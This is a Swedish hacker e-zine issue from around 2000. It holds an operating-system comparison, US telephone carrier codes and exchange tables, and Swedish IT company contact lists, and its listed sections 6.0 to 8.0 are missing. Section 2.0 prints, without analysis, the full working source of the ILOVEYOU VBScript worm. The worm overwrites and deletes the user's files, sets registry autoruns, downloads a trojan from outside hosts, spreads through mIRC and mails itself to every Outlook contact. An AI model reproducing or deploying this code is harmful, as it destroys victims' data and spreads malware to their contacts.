http://www.teliasuger.com  ---> Sidan kommer se ut så här tills all grafik är klar.
               


                     teliasuger.com och streetwh0reproductions inc presenterar...

                                      
 			            " S T R E E T W H O R E "
						#2

					  
-------------->
INNEHÅLL
-------------->

--------------------------------------------------------------->
1.0 Test av BeOS,Linux,MacOS,Win98 och Windows2000.
--------------------------------------------------------------->
2.0 Käll koden till "LOVE-LETTER-FOR-YOU.TXT.vbs"
--------------------------------------------------------------->
3.0 Namn och förkortningar på Amerikanska telefon bolag.
--------------------------------------------------------------->
4.0 Fax/telefon nummer och web adresser till företag. 
--------------------------------------------------------------->
5.0 Riktnummer till hela USA samt telefon operatören som äger nummret.
--------------------------------------------------------------->
6.0 \/\The Conscience of a Hacker/\/ 
--------------------------------------------------------------->
7.0 Telia Konton.
--------------------------------------------------------------->
8.0 Slutord.
--------------------------------------------------------------->

--------------------------------------------------------------------------------------------------->
1.0 Test av BeOS,Linux,Mac OS,Windows98 och Windows 2000.
--------------------------------------------------------------------------------------------------->  

---------------->
Leverantör[1]:
---------------->
Pris[2]:
---------------->
Pris/Uppgradering[3]:
---------------->
Översatt till svenska[4]:
---------------->
Minneskrav[5]:
---------------->
Usb stöd[6]:
---------------->
Strömsparfunktioner[7]:
---------------->
Stöd för flera skärmar[8]:
---------------->
Operativsystem multikörning[9]:
---------------->
Program kan delas in i trådar[10]:
---------------->
Kan använda mer än en processor[11]:
---------------->
Fördelar[12]:
---------------->
Nackdelar[13]:
---------------->

-------------------------------------------------------------------------------------------------------------------------->

-------------------------->
BeOS 5.0 Personal Edition
-------------------------->
--->
[1] = www.be.com
--->  
[2] = Gratis
--->
[3] = N/A.
--->
[4] = Nej
--->
[5] = 32
--->
[6] = Ja
--->
[7] = Nej
--->
[8] = Nej
--->
[9] = Ja
--->
[10] = Ja
--->
[11] = Ja
--->
[12] = Mycket snabbt, låg fördröjning. Lämpar sig för realtidstillämpningar som audio och video. Lätt också att installera.
--->
[13] = Förvarande så finns det extremt lite program för BeOS. Systemet saknar också "strömsparfunktioner".
--->
Slutpoäng: 8/10 
-------------------------------------------------------------------------------------------------------------------------->

-------------------------->
Mac OS 9
-------------------------->
--->
[1] = Apple.
---> 
[2] = Ingår vid datorköp.
--->
[3] = 1000kr
--->
[4] = Ja
--->
[5] = 16
--->
[6] = Ja
--->
[7] = Ja
--->
[8] = Ja
--->
[9] = Nej
--->
[10] = Nej
--->
[11] = Nej
--->
[12] = Genom tänkt, bra användargränssnitt, helt på svenska. Väldigt bra program utbud.
--->
[13] = Går endast att köra på Apples datorer. Finns också brister i multikörning och minnesskydd.
--->
Slutpoäng: 6/10
-------------------------------------------------------------------------------------------------------------------------->

-------------------------->
Red Hat Linux 6.2 Deluxe
-------------------------->
--->
[1] = Linuxbutiken 
--->
[2] = 600Kr
--->
[3] = N/A
--->
[4] = Endast vissa delar.
--->
[5] = 16
--->
[6] = Nej
--->
[7] = Ja
--->
[8] = Nej
--->
[9] = Ja
--->
[10] = Ja
--->
[11] = Ja
--->
[12] = Snabbt, Bra på multikörning till ett lågt pris.
--->
[13] = Hopplock av programmoduler från olika tillverkare ger inkonsekvent användargränssnitt och luckor i funktionaliteten.
--->
Slutpoäng: 7/10
-------------------------------------------------------------------------------------------------------------------------->

-------------------------->
Windows 98
-------------------------->
--->
[1] = Microsoft
--->
[2] = 1500kr
--->
[3] = 900kr
--->
[4] = Ja
--->
[5] = 16
--->
[6] = Ja
--->
[7] = Ja
--->
[8] = Ja
--->
[9] = Ja
--->
[10] = Ja
--->
[11] = Nej
--->
[12] = Enormt program utbud. Genomtänkt, bra användargränssnitt, helt på svenska. Heltäckande tillgång till drivrutiner.
--->
[13] = Dåligt minnesskydd, mindre bra för realtidstillämpningar på grund av fördröjningar.
--->
Slutpoäng: 8/10
-------------------------------------------------------------------------------------------------------------------------->

-------------------------->
Windows 2000 
-------------------------->
--->
[1] = Microsoft
--->
[2] = 3000kr
--->
[3] = 1200kr
--->
[4] = Ja
--->
[5] = 32
--->
[6] = Ja
--->
[7] = Ja
--->
[8] = Ja
--->
[9] = Ja
--->
[10] = Ja
--->
[11] = Ja
--->
[12] = Enormt program utbud. Utmärkt genomtänkt, bra användargränssnitt, helt på svenska.
--->
[13] = Ganska hårdvarukrävande. Inte lika bra hårdvaru stöd som Windows98. Realtivt högt pris.
--->
Slutpoäng: 10/10
-------------------------------------------------------------------------------------------------------------------------->
									  Written and tested by: sysedit


-------------------------------------------------------------------------------------------------------------------------->
2.0 Käll koden till "LOVE-LETTER-FOR-YOU.TXT.vbs"
-------------------------------------------------------------------------------------------------------------------------->

On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr> =1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKerne
l32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win3
2DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet 
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njb
vYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbv
bmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-
BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdg
lkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUG
SFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") 
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq <> folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or 
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine ";  Please dont edit this script... mIRC will corrupt, 
if mIRC will"
scriptini.WriteLine "     corrupt... WINDOWS will affect and will not run 
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2=  /.dcc send $nick 
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)> int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1=" <HTML>  <HEAD>  <TITLE> LOVELETTER - HTML <?-?TITLE>  <META 
NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@> "&vbcrlf& _
" <META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? 
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@> "&vbcrlf& _
" <META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is 
good...@-@> "&vbcrlf& _
" <?-?HEAD>  <BODY 
ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ 
"&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ 
BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@> "&vbcrlf& _
" <CENTER>  <p> This HTML file need ActiveX Control <?-?p>  <p> To Enable to read 
this HTML file <BR> - Please press #-#YES#-# button to Enable 
ActiveX <?-?p> "&vbcrlf& _
" <?-?CENTER>  <MARQUEE LOOP=@-@infinite@-@ 
BGCOLOR=@-@yellow@-@> ----------z--------------------z---------- <?-?MARQUEE>  
"&vbcrlf& _
" <?-?BODY>  <?-?HTML> "&vbcrlf& _
" <SCRIPT language=@-@JScript@-@> "&vbcrlf& _
" <!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var 
hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?--> "&vbcrlf& _
" <?-?SCRIPT> "&vbcrlf& _
" <SCRIPT LANGUAGE=@-@VBScript@-@> "&vbcrlf& _
" <!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite 
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dir
system&@-@^-^MSKernel32.vbs@-@"&vbcrlf& 
_
"?-??-?--> "&vbcrlf& _
" <?-?SCRIPT> "
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
										Input by: sysedit
-------------------------------------------------------------------------------------------------------------------------->
3.0 Namn och förkortningar på Amerikanska telefon bolag. (jämför med listan på 5.0)
-------------------------------------------------------------------------------------------------------------------------->

ADG - Advantage Network, Inc.             AGN - AMRIGON
ALG - Allnet Communication Services       AMM - Access Long Distance
AAM - ALASCOM                             ARE - American Express TRS
ARZ - AmeriCall Corporation (Calif.)      ATC - Action Telecom Co.
ATX - AT&T                                BML - Phone America
BUR - Burlington Tel.                     CAB - Hedges Communications
CAN - Telcom Canada                       CNO - COMTEL of New Orleans
CQU - ConQuest Comm. Corp                 CSY - COM Systems
CUX - Compu-Tel Inc.                      CYT - ClayDesta Communications
DCT - Direct Communications, Inc.         DLT - Delta Communications, Inc.
EDS - Electronic Data Systems Corp.       ETS - Eastern Telephone Systems, Inc.
EXF - Execulines of Florida, Inc.         FDG - First Digital Network
FDN - Florida Digital Network             FDT - Friend Technologies
FST - First Data Resources                GCN - General Communications, Inc.
GTS - Telenet Comm. Corp.                 HNI - Houston Network, Inc.
ITT - United States Transmission System   LDD - LDDS-II, Inc.
LDL - Long Distance for Less              LGT - LITEL
LNS - Lintel Systems                      LSI - Long Distance Savers
LTQ - Long Distance for Less              MAL - MIDAMERICAN
MCI - MCI Telecommunications Corp.        MDE - Meade Associates
MEC - Mercury, Inc.                       MIC - Microtel, Inc.
MIT - Midco Communications                MTD - Metromedia Long Distance
NLD - National Data Corp.                 NTK - Network Telemanagement Svcs.
NTS - NTS Communications                  ONC - OMNICALL, Inc.
ONE - One Call Communications, Inc.       PHE - Phone Mail, Inc.
PLG - Pilgrim Telephone Co.               PRO - PROTO-COL
RBW - R-Comm                              RTC - RCI Corporation
SAN - Satelco                             SCH - Schneider Communications
SDY - TELVUE Corp.                        SIR - Southern Interexchange Services
SLS - Southland Systems, Inc.             SNH - Sunshine Telephone Co.
SNT - SouthernNet, Inc.                   SOC - State of California
TBQ - Telecable Corp.                     TDD - Teleconnect
TDX - Cable & Wireless Comm.              TED - TeleDial America
TEM - Telesystems, Inc.                   TEN - Telesphere Network, Inc.
TET - Teltec Savings Communications Co    TGN - Telemanagement Consult't Corp.
THA - Touch America                       TID - TMC South Central Indiana
TKC - TK Communications, Inc.             TLS - TELE-SAV
TMU - Tel-America, Inc.                   TNO - ATC Cignal Communications
TOM - TMC of Montgomery                   TOR - TMC of Orlando
TSF - SOUTH-TEL                           TSH - Tel-Share
TTH - Tele Tech, Inc.                     TTU - Total-Tel USA
TXN - Tex-Net                             USL - U.S. Link Long Distance
UTC - U.S. Telcom, Inc. (U.S. Sprint)     VOA - Valu-Line
VST - STAR-LINE                           WES - Westel
WUT - Western Union Telegraph Co.
										Written by: sysedit
-------------------------------------------------------------------------------------------------------------------------->
4.0 Fax/telefon nummer och web adresser till företag i Sverige. (Samtliga IT/dator företag.)
-------------------------------------------------------------------------------------------------------------------------->

Företag: 		Telefon 		Fax 		http:// 


ACI Nordic 		08-750 63 00		08-750 63 60    www.aci.se

Adobe Svenska		08-752 33 00  		08-751 49 55    www.adobe.se

Apple 			08-703 30 00 		08-703 30 01 	www.apple.se

BIP			0942-475 00 		    N/A		www.bip.net

CAV 			040-49 64 20		040-49 69 10 	www.cav.se

Compaq 			08-703 52 00 		08-751 20 57 	www.compaq.se

Corel			08-655 26 18 		08-65536 27 	www.corel.ca

Datacentrum 		0371-135 02 		0371-838 17 	www.datacentrum.se

Datelcomp 		08-583 584 95 		08-583 528 77	www.datelcomp.se 

Dell 			08-590 051 00 		08-590 737 89 	www.dell.se

Dimac 			042-16 02 00 		042-16 02 30 	www.dimac.net

Dustin 			08-553 440 00 		08-553 443 40	www.dustin.se

EIS			018-13 05 20 		018-13 00 27 	www.euroinfosys.se

Ekab 			013-36 93 00 		013-36 93 20 	www.ekab.se 

EUD Teknik 		018-34 93 90 	 	018-34 93 98 	www.eud.se

Fujitsu Nordic 		08-626 60 00 		08-626 67 11 	www.fujitsu-europe.com

Fujitsu Siemens 	08-793 82 00 		08-793 89 71 	www.fujitsu.se

Gateway 		08-545 120 00 		08-545 120 85 	www.gateway.se

Hewlett-Packard 	08-444 20 00		08-444 26 66 	www.hp.se

Home 			08-509 030 00 		     N/A 	www.home.se

IBM 			08-793 10 00 		08-793 49 11 	www.ibm.se

Lexmark Sverige 	08-522 579 00 		08-730 44 33 	www.lexmark.se

Libertysurf 		08-563 150 00 		     N/A 	www.libertysurf.se

Linuxbutiken 		08-556 800 45		08-448 23 92    www.linuxbutiken.com

Mapcom Geografiska info 018-12 29 10 		018-12 87 69 	www.mapcom.se

Microsoft 		08-752 56 00 		08-750 51 58 	www.microsoft.se

Netlink 		08-22 38 90 		     N/A 	www.netlink.se

Pyrotech 		046-25 309 00 		046-25 00 03 	www.pyrotech.se

Runaware 		08-556 309 00 		08-566 309 30 	www.runaware.com

Sense Office 		08-504 103 10 		08-500 277 77	www.senseforsaljning.se

SMG 			08-587 771 00 		08-587 773 15	seweb.smg.net

SPC Trading 		018-480 90 00 		018-480 90 90 	www.spc.se

Spray 			08-527 902 00 		     N/A 	www.spray.se

Studentlitteratur...    046-31 22 22 		046-30 53 39  	www.studentlitteratur.se

Symantec Sverige 	08-457 34 00 		08-457 34 05 	www.symantec.se

TCX Datakonsult 	08-729 69 10 		     N/A 	web.mysql.com 

Tele 2 			08-562 640 00 		08-562 640 00   www.tele2.se

Telenordia 		0200-87 00 87 		0200-87 11 87 	www.telenordia.se

Telia 			90400 			     N/A 	www.telia.se

Toshiba 		08-734 35 50 		08-27 10 77 	www.toshiba.se

Utfors 			018-480 21 00 		018-480 21 79 	www.utfors.se

Xircom 			08-590 332 80 		08-590 717 81 	www.xircom.se
											Written by: sysedit
-------------------------------------------------------------------------------------------------------------------------->
5.0 Riktnummer till hela USA samt telefon operatören som äger nummret.
-------------------------------------------------------------------------------------------------------------------------->

221 ATX        222 ATX        223 ATX        224 LDL        225 ATX
226 MIC        227 ATX        228 ATX        229 TDX        230 NTK
231 ATX        232 ATX        233 ATX        234 MCI        235 ATX
236 SCH        237 ATX        238 ATX        239 DLT        240 SIR
241 ATX        242 ATX        243 ATX        244 ---        245 ATX
246 ---        247 ATX        248 ATX        249 ---        250 ---
251 ATX        252 ATX        253 ATX        254 TTU        255 ATX
256 LSI        257 ATX        258 ATX        259 ---        260 ---
261 SCH        262 ATX        263 CAN        264 ICT        265 CAN
266 CSY        267 CAN        268 CAN        269 FDG        270 ---
271 ---        272 ATX        273 ---        274 MCI        275 ITT
276 ONE        277 SNT        278 ---        279 MAL        280 ADG
281 ---        282 ATX        283 MCI        284 MCI        285 ---
286 ---        287 ---        288 MCI        289 MCI        290 ---
291 ---        292 ATX        293 PRO        294 ---        295 ---
296 ---        297 ARE        298 ---        299 CYT

321 ATX        322 ATX        323 ATX        324 HNI        325 ATX
326 UTC        327 ATX        328 ATX        329 TET        330 TET
331 ATX        332 ATX        333 MCI        334 ATX        335 SCH
336 ATX        337 FST        338 ATX        339 ---        340 ---
341 ATX        342 ATX        343 ATX        344 ATX        345 ATX
346 ATX        347 UTC        348 ATX        349 DCT        350 CSY
351 ATX        352 ATX        353 ---        354 ---        355 ---
356 ATX        357 ---        358 ATX        359 UTC        360 ---
361 CAN        362 ATX        363 CAN        364 HNI        365 MCI
366 UTC        367 ATX        368 ATX        369 TDD        370 TDD
371 ---        372 ATX        373 TDD        374 ---        375 TNO
376 ---        377 GTS        378 ---        379 ---        380 ---
381 ---        382 ATX        383 TDD        384 FDT        385 CAB
386 TBQ        387 CAN        388 ---        389 ---        390 ---
391 ---        392 ATX        393 EXF        394 ---        395 ---
396 ---        397 TDD        398 ---        399 ARZ

421 ATX        422 ATX        423 ATX        424 ATX        425 TTH
426 ATX        427 ---        428 ATX        429 ---        430 ---
431 ATX        432 ATX        433 ATX        434 AGN        435 ATX
436 IDN        437 ATX        438 ATX        439 ---        440 TXN
441 ATX        442 ATX        443 ATX        444 MCI        445 ATX
446 ATX        447 ATX        448 ATX        449 ---        450 USL
451 ATX        452 ATX        453 ATX        454 ALN        455 ---
456 MCI        457 ATX        458 ATX        459 ---        460 ---
461 CAN        462 ATX        463 CAN        464 ---        465 CAN
466 ALN        467 ICT        468 ATX        469 ---        470 ---
471 ALN        472 ATX        473 ---        474 ---        475 TDD
476 TDD        477 ---        478 AAM        479 ---        480 ---
481 ---        482 ATX        483 ---        484 TDD        485 TDD
486 TDX        487 ---        488 ---        489 TOM        490 ---
491 ---        492 ATX        493 ---        494 ---        495 ---
496 ---        497 ---        498 ---        499 ---

521 ATX        522 ATX        523 ATX        524 ATX        525 ATX
526 ATX        527 ATX        528 ATX        529 MIT        530 ---
531 ATX        532 ATX        533 ATX        534 ---        535 ATX
536 ALN        537 ATX        538 ATX        539 ---        540 ---
541 ATX        542 ATX        543 ATX        544 ATX        545 ATX
546 UTC        547 ATX        548 ATX        549 ---        550 CMA
551 ATX        552 ATX        553 ATX        554 ATX        555 ATX
556 ATX        557 ALN        558 ATX        559 ---        560 ---
561 CAN        562 ATX        563 CAN        564 ---        565 CAN
566 ALN        567 CAN        568 ---        569 ---        570 ---
571 ---        572 ATX        573 ---        574 AMM        575 ---
576 ---        577 GTS        578 ---        579 LNS        580 WES
581 ---        582 ATX        583 TDD        584 TDD        585 ---
586 ATC        587 LTQ        588 ATC        589 LGT        590 ---
591 ---        592 ATX        593 TDD        594 TDD        595 ---
596 ---        597 ---        598 ---        599 ---

621 ATX        622 ATX        623 ---        624 ATX        625 NLD
626 ATX        627 MCI        628 ATX        629 ---        630 ---
631 ATX        632 ATX        633 ATX        634 ATX        635 ATX
636 CQU        637 ATX        638 ATX        639 BUR        640 ---
641 ATX        642 ATX        643 ATX        644 CMA        645 ATX
646 ---        647 ATX        648 ATX        649 ---        650 ---
651 ---        652 ATX        653 ---        654 ATX        655 ---
656 ---        657 TDD        658 TDD        659 ---        660 ---
661 CAN        662 ATX        663 CAN        664 UTC        665 CAN
666 MCI        667 CAN        668 CAN        669 UTC        670 ---
671 ---        672 ATX        673 TDD        674 TDD        675 ---
676 ---        677 ---        678 MCI        679 ---        680 ---
681 ---        682 ATX        683 MTD        684 ---        685 ---
686 LGT        687 NTS        688 ---        689 ---        690 ---
691 ---        692 ATX        693 ---        694 ---        695 ---
696 ---        697 ---        698 NYC        699 PLG

720 TGN
721 ---        722 ATX        723 ---        724 RTC        725 SAN
726 UTC        727 MCI        728 TDD        729 UTC        730 ---
731 ---        732 ATX        733 UTC        734 ---        735 UTC
736 UTC        737 MEC        738 MEC        739 ---        740 ---
741 MIC        742 ATX        743 EDS        744 ---        745 ---
746 ---        747 TDD        748 TDD        749 TDD        750 ---
751 ---        752 ATX        753 ---        754 TSH        755 ---
756 ---        757 TID        758 ---        759 MCI        760 ---
761 ---        762 ATX        763 ---        764 AAM        765 ---
766 ---        767 UTC        768 SNT        769 ---        770 GCN
771 SNT        772 ATX        773 CUX        774 ---        775 ---
776 UTC        777 MCI        778 UTC        779 TDD        780 TDD
781 ---        782 ATX        783 ALN        784 ALG        785 SNH
786 *1         787 ---        788 ---        789 TMU        790 ---
791 ---        792 ATX        793 ---        794 ---        795 ---
796 ---        797 TID        798 TDD        799 ---

821 ATX        822 ATX        823 THA        824 ATX        825 MCI
826 ATX        827 UTC        828 ATX        829 UTC        830 ---
831 ATX        832 ATX        833 ATX        834 ---        835 ATX
836 TDD        837 TDD        838 ---        839 VST        840 ---
841 ATX        842 ATX        843 ATX        844 LDD        845 ATX
846 ---        847 ATX        848 ATX        849 ---        850 TKC
851 ATX        852 ATX        853 ---        854 ATX        855 ATX
856 ---        857 TLS        858 ATX        859 ---        860 ---
861 ---        862 ATX        863 ALN        864 TEN        865 ---
866 ---        867 ---        868 SNT        869 UTC        870 ---
871 ---        872 ATX        873 MCI        874 ATX        875 ALN
876 MCI        877 UTC        878 ALN        879 ---        880 NAS
881 NAS        882 ATX        883 ---        884 ---        885 ATX
886 ALN        887 ETS        888 MCI        889 ---        890 ---
891 ---        892 ATX        893 ---        894 ---        895 ---
896 TXN        897 ---        898 CGI        899 TDX

921 ---        922 ATX        923 ALN        924 ---        925 ---
926 ---        927 ---        928 CIS        929 ---        930 ---
931 ---        932 ATX        933 ---        934 ---        935 ---
936 RBW        937 MCI        938 ---        939 ---        940 TSF
941 ---        942 ATX        943 ---        944 ---        945 ---
946 ---        947 ---        948 ---        949 ---        950 MCI
951 BML        952 ATX        953 ---        954 ---        955 MCI
956 ---        957 ---        958 *2         959 *2         960 CNO
961 ---        962 ATX        963 SOC        964 ---        965 ---
966 TDX        967 ---        968 TED        969 TDX        970 ---
971 ---        972 ATX        973 ---        974 ---        975 ---
976 ---        977 ---        978 ---        979 ---        980 ---
981 ---        982 ATX        983 WUT        984 ---        985 ---
986 WUT        987 ---        988 WUT        989 TDX        990 ---
991 ---        992 ATX        993 ---        994 ---        995 ---
996 VOA        997 ---        998 ---        999 MCI
								Written by: phrack (ändrat till "dagens datum") av sysedit.
-------------------------------------------------------------------------------------------------------------------------->
